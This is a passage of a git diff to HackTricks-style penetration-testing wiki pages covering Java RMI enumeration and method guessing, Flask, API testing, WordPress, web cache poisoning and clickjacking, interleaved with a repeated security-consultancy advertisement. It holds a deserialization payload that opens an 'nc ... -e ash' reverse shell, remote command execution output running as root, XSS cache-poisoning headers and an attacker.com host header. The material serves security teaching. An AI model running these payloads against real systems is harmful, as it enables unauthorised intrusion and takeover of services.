-port.
-
-When developers want to make their *Java objects* available within the network, they usually bind them to an *RMI registry*.
-The *registry* stores all information required to connect to the object (IP address, listening port, implemented class or
-interface and the ``ObjID`` value) and makes it available under a human readable name (the *bound name*). Clients that want
-to consume the *RMI service* ask the *RMI registry* for the corresponding *bound name* and the registry returns all required
-information to connect. Thus, the situation is basically the same as with an ordinary *DNS* service. The following listing
-shows a small example:
+When developers want to make their _Java objects_ available within the network, they usually bind them to an _RMI registry_. The _registry_ stores all information required to connect to the object (IP address, listening port, implemented class or interface and the `ObjID` value) and makes it available under a human readable name (the _bound name_). Clients that want to consume the _RMI service_ ask the _RMI registry_ for the corresponding _bound name_ and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary _DNS_ service. The following listing shows a small example:
```java
import java.rmi.registry.Registry;
@@ -91,30 +77,21 @@ public class ExampleClient {
}
```
-The second of the above mentioned challenges is solved by the *Distributed Garbage Collector* (*DGC*). This is another
-*RMI service* with a well known ``ObjID`` value and it is available on basically each *RMI endpoint*. When an *RMI client*
-starts to use an *RMI service*, it sends an information to the *DGC* that the corresponding *remote object* is in use.
-The *DGC* can then track the reference count and is able to cleanup unused objects.
+The second of the above mentioned challenges is solved by the _Distributed Garbage Collector_ (_DGC_). This is another _RMI service_ with a well known `ObjID` value and it is available on basically each _RMI endpoint_. When an _RMI client_ starts to use an _RMI service_, it sends an information to the _DGC_ that the corresponding _remote object_ is in use. The _DGC_ can then track the reference count and is able to cleanup unused objects.
-Together with the deprecated *Activation System*, these are the three default components of *Java RMI*:
+Together with the deprecated _Activation System_, these are the three default components of _Java RMI_:
-1. The *RMI Registry* (``ObjID = 0``)
-2. The *Activation System* (``ObjID = 1``)
-3. The *Distributed Garbage Collector* (``ObjID = 2``)
+1. The _RMI Registry_ (`ObjID = 0`)
+2. The _Activation System_ (`ObjID = 1`)
+3. The _Distributed Garbage Collector_ (`ObjID = 2`)
-The default components of *Java RMI* have been known attack vectors for quite some time and multiple vulnerabilities
-exist in outdated *Java* versions. From an attacker perspective, these default components are interisting, because
-they implemented known classes / interfaces and it is easily possible to interact with them.
-This situation is different for custom *RMI services*. To call a method on a *remote object*, you need to know the corresponding
-method signature in advance. Without knowing an existing method signature, there is no way to communicate to a *RMI service*.
+The default components of _Java RMI_ have been known attack vectors for quite some time and multiple vulnerabilities exist in outdated _Java_ versions. From an attacker perspective, these default components are interisting, because they implemented known classes / interfaces and it is easily possible to interact with them. This situation is different for custom _RMI services_. To call a method on a _remote object_, you need to know the corresponding method signature in advance. Without knowing an existing method signature, there is no way to communicate to a _RMI service_.
+## RMI Enumeration
-# RMI Enumeration
+[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) is a _Java RMI_ vulnerability scanner that is capable of identifying common _RMI vulnerabilities_ automatically. Whenever you identify an _RMI_ endpoint, you should give it a try:
-[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) is a *Java RMI* vulnerability scanner that is capable
-of identifying common *RMI vulnerabilities* automatically. Whenever you identify an *RMI* endpoint, you should give it a try:
-
-```console
+```
$ rmg enum 172.17.0.2 9010
[+] RMI registry bound names:
[+]
@@ -174,13 +151,11 @@ $ rmg enum 172.17.0.2 9010
[+] --> Client codebase enabled - Configuration Status: Non Default
```
-The output of the enumeration action is explained in more detail in the [documentation pages](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action)
-of the project. Depending on the outcome, you should try to verify identified vulnerabilities.
+The output of the enumeration action is explained in more detail in the [documentation pages](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) of the project. Depending on the outcome, you should try to verify identified vulnerabilities.
-The ``ObjID`` values displayed by *remote-method-guesser* can be used to determine the uptime of the service.
-This may allows to identify other vulnerabilities:
+The `ObjID` values displayed by _remote-method-guesser_ can be used to determine the uptime of the service. This may allows to identify other vulnerabilities:
-```console
+```
$ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+]
@@ -191,18 +166,13 @@ $ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Count: -32760
```
-# Bruteforcing Remote Methods
+## Bruteforcing Remote Methods
-Even when no vulnerabilities have been identified during enumeration, the available *RMI* services
-could still expose dangerous functions. Furthermore, despite *RMI* communication to *RMI* default
-components is protected by deserialization filters, when talking to custom *RMI* services, such filters are
-usually not in place. Knowing valid method signatures on *RMI* services is therefore valuable.
+Even when no vulnerabilities have been identified during enumeration, the available _RMI_ services could still expose dangerous functions. Furthermore, despite _RMI_ communication to _RMI_ default components is protected by deserialization filters, when talking to custom _RMI_ services, such filters are usually not in place. Knowing valid method signatures on _RMI_ services is therefore valuable.
-Unfortunately, *Java RMI* does not support enumerating methods on *remote objects*. That being said,
-it is possible to bruteforce method signatures with tools like [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
-or [rmiscout](https://github.com/BishopFox/rmiscout):
+Unfortunately, _Java RMI_ does not support enumerating methods on _remote objects_. That being said, it is possible to bruteforce method signatures with tools like [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) or [rmiscout](https://github.com/BishopFox/rmiscout):
-```console
+```
$ rmg guess 172.17.0.2 9010
[+] Reading method candidates from internal wordlist rmg.txt
[+] 752 methods were successfully parsed.
@@ -234,14 +204,14 @@ $ rmg guess 172.17.0.2 9010
Identified methods can be called like this:
-```console
+```
$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar
[+] uid=0(root) gid=0(root) groups=0(root)
```
Or you can perform deserialization attacks like this:
-```console
+```
$ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"
[+] Creating ysoserial payload... done.
[+]
@@ -266,23 +236,18 @@ uid=0(root) gid=0(root) groups=0(root)
More information can be found in these articles:
-* [Attacking Java RMI services after JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)
-* [Method Guessing](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md)
+* [Attacking Java RMI services after JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)
+* [Method Guessing](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md)
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://bishopfox.com/blog/rmiscout)
-Apart from guessing, you should also look in search engines or *GitHub* for the interface or even the
-implementation of an encountered *RMI* service. The *bound name* and the name of the implemented class or interface
-can be helpful here.
+Apart from guessing, you should also look in search engines or _GitHub_ for the interface or even the implementation of an encountered _RMI_ service. The _bound name_ and the name of the implemented class or interface can be helpful here.
+## Known Interfaces
-# Known Interfaces
+[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) marks classes or interfaces as `known` if they are listed in the tool's internal database of known _RMI services_. In these cases you can use the `known` action to get more information on the corresponding _RMI service_:
-[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) marks classes or interfaces as ``known`` if they
-are listed in the tool's internal database of known *RMI services*. In these cases you can use the ``known`` action to get
-more information on the corresponding *RMI service*:
-
-```console
+```
$ rmg enum 172.17.0.2 1090 | head -n 5
[+] RMI registry bound names:
[+]
@@ -341,21 +306,19 @@ $ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
[+] - https://github.com/qtc-de/beanshooter
```
-# Shodan
+## Shodan
* `port:1099 java`
-
-# Tools
+## Tools
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://github.com/BishopFox/rmiscout)
* [BaRMIe](https://github.com/NickstaDB/BaRMIe)
+## HackTricks Automatic Commands
-# HackTricks Automatic Commands
-
-```text
+```
Protocol_Name: Java RMI #Protocol Abbreviation if there is one.
Port_Number: 1090,1098,1099,1199,4443-4446,8999-9010,9999 #Comma separated if there is more than one.
Protocol_Description: Java Remote Method Invocation #Protocol Abbreviation Spelled out
@@ -366,7 +329,13 @@ Entry_1:
Command: rmg enum {IP} {PORT}
```
+{% hint style="danger" %}
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
@@ -383,5 +352,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/network-services-pentesting/pentesting-web/flask.md b/network-services-pentesting/pentesting-web/flask.md
index 34dfa3829..aa47e2f9b 100644
--- a/network-services-pentesting/pentesting-web/flask.md
+++ b/network-services-pentesting/pentesting-web/flask.md
@@ -16,6 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+****
+
**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**
## Cookies
@@ -74,6 +84,14 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
Support HackTricks and get benefits!
diff --git a/network-services-pentesting/pentesting-web/web-api-pentesting.md b/network-services-pentesting/pentesting-web/web-api-pentesting.md index 63ec66e36..995c3974b 100644 --- a/network-services-pentesting/pentesting-web/web-api-pentesting.md +++ b/network-services-pentesting/pentesting-web/web-api-pentesting.md @@ -16,6 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## Basic Information
Main:
@@ -123,6 +131,14 @@ Old versions may be still be in use and be more vulnerable than latest endpoints
* `/api/CharityEventFeb2020/user/pp/
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## 🛡️ API Security Empire Cheat Sheet
\
@@ -139,9 +155,6 @@ The first gate to enter the API Security Empire is to know how to gather informa
[**PDF Version**](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap.pdf) **|** [**XMind Version**](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap.xmind)
-\
-
-
#### ⚔️ Weapons you will need:
* [BurpSuite](https://portswigger.net/burp/releases)
@@ -195,6 +208,14 @@ Read this document to learn how to **search** and **exploit** Owasp Top 10 API v
* [**https://github.com/flipkart-incubator/Astra**](https://github.com/flipkart-incubator/Astra): Another tool for api testing
* [**https://github.com/assetnote/kiterunner**](https://github.com/assetnote/kiterunner): Great tool to **discover API endpoints**
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
Support HackTricks and get benefits!
diff --git a/network-services-pentesting/pentesting-web/wordpress.md b/network-services-pentesting/pentesting-web/wordpress.md index b56c80ce6..834d13a40 100644 --- a/network-services-pentesting/pentesting-web/wordpress.md +++ b/network-services-pentesting/pentesting-web/wordpress.md @@ -1,7 +1,5 @@ # Wordpress -## Wordpress -Support HackTricks and get benefits!
@@ -18,6 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## Basic Information
**Uploaded** files go to: _http://10.10.10.10/wp-content/uploads/2018/08/a.txt_\
@@ -93,6 +99,14 @@ curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-conten
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## Active enumeration
### Plugins and Themes
@@ -277,6 +291,14 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
#You can try to bruteforce the admin user using wpscan with "-U admin"
```
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## **Panel RCE**
**Modifying a php from the theme used (admin credentials needed)**
@@ -404,7 +426,13 @@ Also, **only install trustable WordPress plugins and themes**.
* **Limit login attempts** to prevent Brute Force attacks
* Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
-##
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
diff --git a/pentesting-web/cache-deception.md b/pentesting-web/cache-deception.md
index 902e6bc45..9c19066f0 100644
--- a/pentesting-web/cache-deception.md
+++ b/pentesting-web/cache-deception.md
@@ -1,4 +1,4 @@
-
+# Cache Poisoning and Cache Deception
-# The difference
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+## The difference
> **What is the difference between web cache poisoning and web cache deception?**
>
> * In **web cache poisoning**, the attacker causes the application to store some malicious content in the cache, and this content is served from the cache to other application users.
> * In **web cache deception**, the attacker causes the application to store some sensitive content belonging to another user in the cache, and the attacker then retrieves this content from the cache.
-# Cache Poisoning
+## Cache Poisoning
The goal of poisoning the cache is to make the **clients load unexpected resources partially or totally controlled by the attacker**.\
The poisoned response will only be served to users who visit the affected page while the cache is poisoned. As a result, the impact can range from non-existent to massive depending on whether the page is popular or not.
In order to perform a cache poisoning attack you need first to **identify unkeyed inputs** (parameters not needed to appear on the the cached request but that change the returned page), see **how to abuse** this parameter and **get the response cached**.
-## Identify and evaluate unkeyed inputs
+### Identify and evaluate unkeyed inputs
You could use [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) to **brute-force parameters and headers** that may be **changing the response of the page**. For example, a page may be using the header `X-Forwarded-For` to indicate the client to load script from there:
@@ -39,11 +46,11 @@ You could use [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca0
```
-## Elicit a harmful response from the back-end server
+### Elicit a harmful response from the back-end server
With the parameter/header identified check how it is being **sanitised** and **where** is it **getting reflected** or affecting the response from the header. Can you abuse it any any way (perform a XSS or load a JS code controlled by you? perform a DoS?...)
-## Get the response cached
+### Get the response cached
Once you have **identified** the **page** that can be abused, which **parameter**/**header** to use and **how** to **abuse** it you need to get the page cached. Depending on the resource you are trying to get in the cache this could time more or less time and some times you just will need to be trying several seconds.\
The header **`X-Cache`** in the response could be very useful as it may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached.\
@@ -53,9 +60,9 @@ One more header related to the cache is **`Age`**. It defines the times in secon
When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working.
-# Examples
+## Examples
-## Easiest example
+### Easiest example
A header like `X-Forwarded-For` is being reflected in the response unsanitized>\
You can send a basic XSS payload and poison the cache so everybody that access page will be XSSed:
@@ -68,7 +75,7 @@ X-Forwarded-Host: a.">"
_Note that this will poison a request to `/en?region=uk` not to `/en`_
-## Using web cache poisoning to exploit cookie-handling vulnerabilities
+### Using web cache poisoning to exploit cookie-handling vulnerabilities
Cookies could also be reflected on the response of a page. If you can abuse it to cause a XSS for example, you could be able to exploit XSS in several clients that load the malicious cache response.
@@ -80,7 +87,7 @@ Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
Note that if the vulnerable cookie is very used by the users, regular requests will be cleaning the cache.
-## Using multiple headers to exploit web cache poisoning vulnerabilities
+### Using multiple headers to exploit web cache poisoning vulnerabilities
Some time you will need to **exploit several ukneyed inputs** to be able to abuse a cache. For example, you may find an **Open redirect** if you set `X-Forwarded-Host` to a domain controlled by you and `X-Forwarded-Scheme` to `http`.**If** the **server** is **forwarding** all the **HTTP** requests **to HTTPS** and using the header `X-Forwarded-Scheme` as domain name for the redirect. You can control where the pagepointed by the redirect.
@@ -91,7 +98,7 @@ X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
X-Forwarded-Scheme: http
```
-## Exploiting with limited `Vary`header
+### Exploiting with limited `Vary`header
If you found that the **`X-Host`** header is being used as **domain name to load a JS resource** but the **`Vary`** header in the response is indicating **`User-Agent`** . Then, you need to find a way to ex-filtrate the User-Agent of the victim and poison the cache using that user agent:
@@ -102,16 +109,25 @@ User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
X-Host: attacker.com
```
-## Exploiting HTTP Cache Poisoning abusing HTTP Request Smuggling
+### Exploiting HTTP Cache Poisoning abusing HTTP Request Smuggling
Learn here about how to perform [Cache Poisoning attacks abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning).
-## Automated testing for Web Cache Poisoning
+### Automated testing for Web Cache Poisoning
+
The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) can be used to test automated for web cache poisoning. It supports many different techniques and is highly customizable.
Example usage: `wcvs -u example.com`
-# Cache Deception
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+## Cache Deception
The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**.
@@ -125,12 +141,19 @@ Note that the **cache proxy** should be **configured** to **cache** files **base
Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception).
-# References
+## References
* [https://portswigger.net/web-security/web-cache-poisoning](https://portswigger.net/web-security/web-cache-poisoning)
* [https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities](https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities)
* [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712)
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
-# What is Clickjacking
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+## What is Clickjacking
Clickjacking is an attack that **tricks** a **user** into **clicking** a webpage **element** which is **invisible** or disguised as another element. This can cause users to unwittingly download malware, visit malicious web pages, provide credentials or sensitive information, transfer money, or purchase products online. (From [here](https://www.imperva.com/learn/application-security/clickjacking/)).
-## Prepopulate forms trick
+### Prepopulate forms trick
Sometimes is possible to **fill the value of fields of a form using GET parameters when loading a page**. An attacker may abuse this behaviours to fill a form with arbitrary data and send the clickjacking payload so the user press the button Submit.
-## Populate form with Drag\&Drop
+### Populate form with Drag\&Drop
If you need the user to **fill a form** but you don't want to directly ask him to write some specific information (like your email or and specific password that you know), you can just ask him to **Drag\&Drop** something that will write your controlled data like in [**this example**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/).
-## Basic Payload
+### Basic Payload
```markup
@@ -16,22 +16,29 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %}
+
-# The difference
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+## The difference
> **What is the difference between web cache poisoning and web cache deception?**
>
> * In **web cache poisoning**, the attacker causes the application to store some malicious content in the cache, and this content is served from the cache to other application users.
> * In **web cache deception**, the attacker causes the application to store some sensitive content belonging to another user in the cache, and the attacker then retrieves this content from the cache.
-# Cache Poisoning
+## Cache Poisoning
The goal of poisoning the cache is to make the **clients load unexpected resources partially or totally controlled by the attacker**.\
The poisoned response will only be served to users who visit the affected page while the cache is poisoned. As a result, the impact can range from non-existent to massive depending on whether the page is popular or not.
In order to perform a cache poisoning attack you need first to **identify unkeyed inputs** (parameters not needed to appear on the the cached request but that change the returned page), see **how to abuse** this parameter and **get the response cached**.
-## Identify and evaluate unkeyed inputs
+### Identify and evaluate unkeyed inputs
You could use [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) to **brute-force parameters and headers** that may be **changing the response of the page**. For example, a page may be using the header `X-Forwarded-For` to indicate the client to load script from there:
@@ -39,11 +46,11 @@ You could use [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca0
```
-## Elicit a harmful response from the back-end server
+### Elicit a harmful response from the back-end server
With the parameter/header identified check how it is being **sanitised** and **where** is it **getting reflected** or affecting the response from the header. Can you abuse it any any way (perform a XSS or load a JS code controlled by you? perform a DoS?...)
-## Get the response cached
+### Get the response cached
Once you have **identified** the **page** that can be abused, which **parameter**/**header** to use and **how** to **abuse** it you need to get the page cached. Depending on the resource you are trying to get in the cache this could time more or less time and some times you just will need to be trying several seconds.\
The header **`X-Cache`** in the response could be very useful as it may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached.\
@@ -53,9 +60,9 @@ One more header related to the cache is **`Age`**. It defines the times in secon
When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working.
-# Examples
+## Examples
-## Easiest example
+### Easiest example
A header like `X-Forwarded-For` is being reflected in the response unsanitized>\
You can send a basic XSS payload and poison the cache so everybody that access page will be XSSed:
@@ -68,7 +75,7 @@ X-Forwarded-Host: a.">"
_Note that this will poison a request to `/en?region=uk` not to `/en`_
-## Using web cache poisoning to exploit cookie-handling vulnerabilities
+### Using web cache poisoning to exploit cookie-handling vulnerabilities
Cookies could also be reflected on the response of a page. If you can abuse it to cause a XSS for example, you could be able to exploit XSS in several clients that load the malicious cache response.
@@ -80,7 +87,7 @@ Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
Note that if the vulnerable cookie is very used by the users, regular requests will be cleaning the cache.
-## Using multiple headers to exploit web cache poisoning vulnerabilities
+### Using multiple headers to exploit web cache poisoning vulnerabilities
Some time you will need to **exploit several ukneyed inputs** to be able to abuse a cache. For example, you may find an **Open redirect** if you set `X-Forwarded-Host` to a domain controlled by you and `X-Forwarded-Scheme` to `http`.**If** the **server** is **forwarding** all the **HTTP** requests **to HTTPS** and using the header `X-Forwarded-Scheme` as domain name for the redirect. You can control where the pagepointed by the redirect.
@@ -91,7 +98,7 @@ X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
X-Forwarded-Scheme: http
```
-## Exploiting with limited `Vary`header
+### Exploiting with limited `Vary`header
If you found that the **`X-Host`** header is being used as **domain name to load a JS resource** but the **`Vary`** header in the response is indicating **`User-Agent`** . Then, you need to find a way to ex-filtrate the User-Agent of the victim and poison the cache using that user agent:
@@ -102,16 +109,25 @@ User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
X-Host: attacker.com
```
-## Exploiting HTTP Cache Poisoning abusing HTTP Request Smuggling
+### Exploiting HTTP Cache Poisoning abusing HTTP Request Smuggling
Learn here about how to perform [Cache Poisoning attacks abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning).
-## Automated testing for Web Cache Poisoning
+### Automated testing for Web Cache Poisoning
+
The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) can be used to test automated for web cache poisoning. It supports many different techniques and is highly customizable.
Example usage: `wcvs -u example.com`
-# Cache Deception
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+## Cache Deception
The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**.
@@ -125,12 +141,19 @@ Note that the **cache proxy** should be **configured** to **cache** files **base
Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception).
-# References
+## References
* [https://portswigger.net/web-security/web-cache-poisoning](https://portswigger.net/web-security/web-cache-poisoning)
* [https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities](https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities)
* [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712)
+{% hint style="danger" %}
+
+
